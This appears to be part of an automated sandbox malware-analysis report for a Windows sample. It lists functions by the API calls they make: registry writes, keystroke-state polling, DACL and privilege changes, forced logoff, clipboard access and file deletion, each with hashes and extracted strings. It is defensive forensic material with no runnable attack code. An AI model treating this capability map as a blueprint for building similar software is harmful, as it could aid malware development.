                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1803514871-438819550
                                                                                                                        • Opcode ID: df00e19d0d0891c0e9c35a7da8d02fcd812b50d5eb66960c189fc20492fb5b5d
                                                                                                                        • Instruction ID: 9d3e71ab9d022139599e1b1565dadd7e54d40e8f8acb4b1cd6027bc787bb33fb
                                                                                                                        • Opcode Fuzzy Hash: df00e19d0d0891c0e9c35a7da8d02fcd812b50d5eb66960c189fc20492fb5b5d
                                                                                                                        • Instruction Fuzzy Hash: FF31F576A0024A6FDB21DBB1DC48ADE77ACAF49370F104165F954D3090EB35DA49EB50
                                                                                                                        APIs
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01000BDE
                                                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0100F910,00000000,?,00000000,?,?), ref: 01000C4C
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01000C94
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01000D1D
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0100103D
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0100104A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                        • API String ID: 536824911-966354055
                                                                                                                        • Opcode ID: f04456afc01f604d1734fee952067914390dfc4786e99a1a686ded09f784025e
                                                                                                                        • Instruction ID: 8b218ff5e106eeee694bb9b04f1971eff700a2df9e8034e209f716c8048e9cd5
                                                                                                                        • Opcode Fuzzy Hash: f04456afc01f604d1734fee952067914390dfc4786e99a1a686ded09f784025e
                                                                                                                        • Instruction Fuzzy Hash: C7029E752046019FDB15EF18C885E6AB7E5FF89714F04885DF88A9B3A2CB78ED01DB81
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00FEF37E
                                                                                                                        • _wcscmp.LIBCMT ref: 00FEF393
                                                                                                                        • _wcscmp.LIBCMT ref: 00FEF3AA
                                                                                                                          • Part of subcall function 00FE45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FE45DC
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00FEF3D9
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00FEF3E4
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00FEF400
                                                                                                                        • _wcscmp.LIBCMT ref: 00FEF427
                                                                                                                        • _wcscmp.LIBCMT ref: 00FEF43E
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FEF450
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(0103A5A0), ref: 00FEF46E
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FEF478
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00FEF485
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00FEF497
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1824444939-438819550
                                                                                                                        • Opcode ID: f4fb80279a39287587498d13f9bd0b4715a45eecac3195dba560805067cea4f0
                                                                                                                        • Instruction ID: e404734b1f1dd87250d9dbbc17e265bbf6948c0d6038d78e56ac8940d909e9ab
                                                                                                                        • Opcode Fuzzy Hash: f4fb80279a39287587498d13f9bd0b4715a45eecac3195dba560805067cea4f0
                                                                                                                        • Instruction Fuzzy Hash: E531D772A0125A6FCB21EB65DC84ADE77AC9F45370F104165F880D30D0DB35DE48EA50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FD874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FD8766
                                                                                                                          • Part of subcall function 00FD874A: GetLastError.KERNEL32(?,00FD822A,?,?,?), ref: 00FD8770
                                                                                                                          • Part of subcall function 00FD874A: GetProcessHeap.KERNEL32(00000008,?,?,00FD822A,?,?,?), ref: 00FD877F
                                                                                                                          • Part of subcall function 00FD874A: HeapAlloc.KERNEL32(00000000,?,00FD822A,?,?,?), ref: 00FD8786
                                                                                                                          • Part of subcall function 00FD874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FD879D
                                                                                                                          • Part of subcall function 00FD87E7: GetProcessHeap.KERNEL32(00000008,00FD8240,00000000,00000000,?,00FD8240,?), ref: 00FD87F3
                                                                                                                          • Part of subcall function 00FD87E7: HeapAlloc.KERNEL32(00000000,?,00FD8240,?), ref: 00FD87FA
                                                                                                                          • Part of subcall function 00FD87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FD8240,?), ref: 00FD880B
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FD825B
                                                                                                                        • _memset.LIBCMT ref: 00FD8270
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FD828F
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00FD82A0
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00FD82DD
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FD82F9
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00FD8316
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FD8325
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00FD832C
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FD834D
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00FD8354
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FD8385
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FD83AB
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FD83BF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3996160137-0
                                                                                                                        • Opcode ID: e58f50eb3564cd2411baa3fa52840dea1d90629b21f9cb6b1c3fa12f3f4f866c
                                                                                                                        • Instruction ID: 285d87ea54e6f6154f7f40780adf8797290ff18c0c9061ff38bbe1a15d88e068
                                                                                                                        • Opcode Fuzzy Hash: e58f50eb3564cd2411baa3fa52840dea1d90629b21f9cb6b1c3fa12f3f4f866c
                                                                                                                        • Instruction Fuzzy Hash: D7616F71D0420AAFDF11DF94DC44AEEBB7AFF04750F08811AF915A7280DB359A16EB60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                        • API String ID: 0-4052911093
                                                                                                                        • Opcode ID: 1ac258704c3da1a4119ad62f3ce919be012005744caa6611f25196d0f3416a0f
                                                                                                                        • Instruction ID: d649e200bc1ca8e2b2a36bc0f0b2cb27b461f5b4719aef5069acbcbe52a9cc0c
                                                                                                                        • Opcode Fuzzy Hash: 1ac258704c3da1a4119ad62f3ce919be012005744caa6611f25196d0f3416a0f
                                                                                                                        • Instruction Fuzzy Hash: CF726F75E002199BEF24CF59C8907AEB7B6FF48320F14816BE859EB390D7749941EB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 010010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01000038,?,?), ref: 010010BC
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01000737
                                                                                                                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                                                                                                                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 010007D6
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0100086E
                                                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01000AAD
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 01000ABA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1240663315-0
                                                                                                                        • Opcode ID: 5d05e1459b881334f446453952d296a26a6c3ed7e47528818f4eb9703f77c8c8
                                                                                                                        • Instruction ID: c82f60c896331dc71658324847cbd847a54d36266e79df9e63ab259fc0d9f106
                                                                                                                        • Opcode Fuzzy Hash: 5d05e1459b881334f446453952d296a26a6c3ed7e47528818f4eb9703f77c8c8
                                                                                                                        • Instruction Fuzzy Hash: 8DE18F31604201AFDB15DF28C884E6EBBE8FF89754F08856DF48ADB2A5DB34E901CB51
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00FE0241
                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00FE02C2
                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00FE02DD
                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00FE02F7
                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00FE030C
                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00FE0324
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00FE0336
                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00FE034E
                                                                                                                        • GetKeyState.USER32(00000012), ref: 00FE0360
                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00FE0378
                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00FE038A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541375521-0
                                                                                                                        • Opcode ID: 87667775e6546767a0eab20fbc7ad9247ebc14fd39bdea4ec5a033ec7ac74ca2
                                                                                                                        • Instruction ID: 17084ff9d8668bf294e421f20b5fa04866b0c025a99b13a744348434164953bb
                                                                                                                        • Opcode Fuzzy Hash: 87667775e6546767a0eab20fbc7ad9247ebc14fd39bdea4ec5a033ec7ac74ca2
                                                                                                                        • Instruction Fuzzy Hash: 0341CA34D047CA6FFF319B6694083B5BEE06F12360F4840ADD6C6561C2EFE559C8A7A2
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                                                                                                                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                                                                                                                        • CoInitialize.OLE32 ref: 00FF8718
                                                                                                                        • CoUninitialize.OLE32 ref: 00FF8723
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,01012BEC,?), ref: 00FF8783
                                                                                                                        • IIDFromString.OLE32(?,?), ref: 00FF87F6
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00FF8890
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00FF88F1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                        • API String ID: 834269672-1287834457
                                                                                                                        • Opcode ID: 1dff1a79b7ef7ea4c6333aa7de13ad0c0528f8a02a784ec74f8990791c8482d3
                                                                                                                        • Instruction ID: 93ce4476c125252a8ff892188e51ab6823d24c03b8b455d1cff5542cd79ba473
                                                                                                                        • Opcode Fuzzy Hash: 1dff1a79b7ef7ea4c6333aa7de13ad0c0528f8a02a784ec74f8990791c8482d3
                                                                                                                        • Instruction Fuzzy Hash: DD61C272608305DFC710EF24C849B6EBBE8AF44794F14480DFA859B2A1DB74ED45EB92
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1737998785-0
                                                                                                                        • Opcode ID: 609d1beb287a97ff08c6eff18e57c698bbed096b76e83d9cc774cd9afb0f72c0
                                                                                                                        • Instruction ID: 0399edad85c596a81486370a11a54ccfd16fc508fee75768d0f676746b37d1ef
                                                                                                                        • Opcode Fuzzy Hash: 609d1beb287a97ff08c6eff18e57c698bbed096b76e83d9cc774cd9afb0f72c0
                                                                                                                        • Instruction Fuzzy Hash: BA21D3357002159FDB21EF60EC49B7A77A8EF08320F148006F986DB261DB79AC01EB94
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                                                                                                                          • Part of subcall function 00FE4CD3: GetFileAttributesW.KERNEL32(?,00FE3947), ref: 00FE4CD4
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00FE3ADF
                                                                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00FE3B87
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00FE3B9A
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00FE3BB7
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FE3BD9
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00FE3BF5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 4002782344-1173974218
                                                                                                                        • Opcode ID: c0a74ef54f5ea0ff3c3428bd42716aa10b9e2f57766e69679be361c2b8da1bd3
                                                                                                                        • Instruction ID: 65d35bf16b5b57c347af7b09cb933280de02854f7571e7615de412bd29fbc367
                                                                                                                        • Opcode Fuzzy Hash: c0a74ef54f5ea0ff3c3428bd42716aa10b9e2f57766e69679be361c2b8da1bd3
                                                                                                                        • Instruction Fuzzy Hash: AB51923180128D9BCF15FBA1CD9A9EDB7B8AF54700F6441A9E44277091DF39AF09EB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00FEF6AB
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00FEF6DB
                                                                                                                        • _wcscmp.LIBCMT ref: 00FEF6EF
                                                                                                                        • _wcscmp.LIBCMT ref: 00FEF70A
                                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 00FEF7A8
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00FEF7BE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 713712311-438819550
                                                                                                                        • Opcode ID: 14fd7e2c99ca71092168b6230f85afb394256f846dab04daa2fb6e905718f97b
                                                                                                                        • Instruction ID: 5b6862241e067b5f8456b54f6cedb2a8f75ea7e1d5bd1dad02c9e523fa57f411
                                                                                                                        • Opcode Fuzzy Hash: 14fd7e2c99ca71092168b6230f85afb394256f846dab04daa2fb6e905718f97b
                                                                                                                        • Instruction Fuzzy Hash: 3541917290024A9FDF21EF65CC85AEEBBB4FF05310F14456AE855A71A0DB349E48EF90
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                        • API String ID: 0-1546025612
                                                                                                                        • Opcode ID: eb1a80f52948915e02727f7b38a84ff04ccf521f971bee9da81a7f8036fa0e55
                                                                                                                        • Instruction ID: f657c1ddf15716a4ad6b47b0e18f698efc7743176e56c51d6884fd8b7f437d00
                                                                                                                        • Opcode Fuzzy Hash: eb1a80f52948915e02727f7b38a84ff04ccf521f971bee9da81a7f8036fa0e55
                                                                                                                        • Instruction Fuzzy Hash: DBA29471E0421ACBEF24DF58C981FADB7B1BF64324F1481A9D856A7280D734AD86EF50
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: bcb2d14444a73115b2ef94ba221a201bcb043c5186faa50646bc9b5504815157
                                                                                                                        • Instruction ID: 705c4c8fea08a17ed4479a2d07f9c266a3178f64300ea42e05e0253c9e5d6021
                                                                                                                        • Opcode Fuzzy Hash: bcb2d14444a73115b2ef94ba221a201bcb043c5186faa50646bc9b5504815157
                                                                                                                        • Instruction Fuzzy Hash: A3128B71A00A09DFDF14DFA4D981AEEB7B6FF48700F14412AE406E7251EB3AAD15EB50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FD8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD8D0D
                                                                                                                          • Part of subcall function 00FD8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8D3A
                                                                                                                          • Part of subcall function 00FD8CC3: GetLastError.KERNEL32 ref: 00FD8D47
                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00FE549B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
